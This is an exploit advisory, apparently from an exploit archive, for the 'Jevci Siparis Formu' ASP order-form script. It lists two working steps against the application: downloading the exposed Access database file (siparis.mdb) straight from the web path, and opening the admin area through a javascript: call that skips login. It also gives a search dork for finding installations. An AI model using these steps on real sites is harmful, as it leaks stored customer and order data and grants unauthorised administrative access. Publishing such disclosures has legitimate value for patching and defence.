id: 11241
date: 03/10/2010
title: Jevci Siparis Formu Scripti Remote database disclosure Vulnerability
author: indoushka
cves: 

====================================================================
Jevci Siparis Formu Scripti Remote database disclosure Vulnerability
====================================================================

========================================================================================                  
| # Title    : Jevci Siparis Formu Scripti => Guestbook DB Vulnerability   
| # Author   : indoushka  
| # Web Site : http://scripti.org/i/jevci_siparis_formu.zip                                                   
| # Dork     : Jevci Siparis Formu                                                                                                              
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       
| # Bug      : Mullti                                                                     
======================      Exploit By indoushka       =================================
# Exploit  :  

1- http://127.0.0.1/jevci_siparis_formu/siparis.mdb

2- put this code to login in admin area javascript:pencere('siparis_yonetim_default.asp')




#  0day.today [2023-03-24]  #